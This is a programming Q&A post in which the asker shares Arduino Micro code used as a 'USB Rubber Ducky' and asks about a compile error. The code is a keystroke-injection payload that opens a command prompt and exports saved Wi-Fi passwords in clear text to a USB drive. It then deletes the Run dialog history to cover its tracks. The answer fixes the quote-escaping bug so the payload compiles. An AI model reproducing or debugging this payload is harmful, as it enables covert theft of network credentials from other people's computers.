# Arduino IDE telling me unable to find string literal operator 'operator""DRIVE'

Tags: c++, arduino

I am kinda a newbie and is new to Arduinos. I'm using the Arduino Micro as a USB Rubber Ducky.

I tried to run this code:

```
#include <Keyboard.h>

void setup() {

    delay(1000);
    Keyboard.begin();
    Keyboard.press(KEY_LEFT_GUI);
    Keyboard.press('r');
    Keyboard.releaseAll();
    delay(500);

    Keyboard.print("cmd");
    delay(1000);

    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();
    delay(500);

    Keyboard.print("mode con: cols=15 lines=1");

    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();
    delay(100);

    Keyboard.print("for /f %d in ('wmic volume get driveletter^, label^|");
    Keyboard.print("find");
    Keyboard.print("str");
    Keyboard.print(" "DRIVE"')");
    Keyboard.print(" do @set DRIVE=%d");
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();
    delay(500);

    Keyboard.print("%DRIVE%");

    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();
    delay(100);

    Keyboard.print("cd Wi-Fi Passwords");

    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();
    delay(100);

    Keyboard.print("netsh wlan export profile key=clear");
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();
    delay(1000);

    Keyboard.print("powershell Remove-ItemProperty -Path 'HKCU:/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU' -Name '*' -ErrorAction SilentlyContinue");
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();

    delay(1000);
    Keyboard.print("exit");
    Keyboard.press(KEY_RETURN);
    Keyboard.releaseAll();
}

void loop() {
  // put your main code here, to run repeatedly:

}
```

However the compiler tells me this

> exit status 1 unable to find string literal operator 'operator""DRIVE'

I don't know where to go from this.

Answer (score 0):

If you want to use " inside of the string literal, you have to escape this character. Now you have  `" "` with suffix `DRIVE`, and this is allowed in C++11 specification. So it's trying to execute that `operator""DRIVE` on string literal.

It's called [User defined literals](http://en.cppreference.com/w/cpp/language/user_literal)

Anyway you have to use:  `(" \"DRIVE\"')");`. Now the DRIVE is just a part of the string.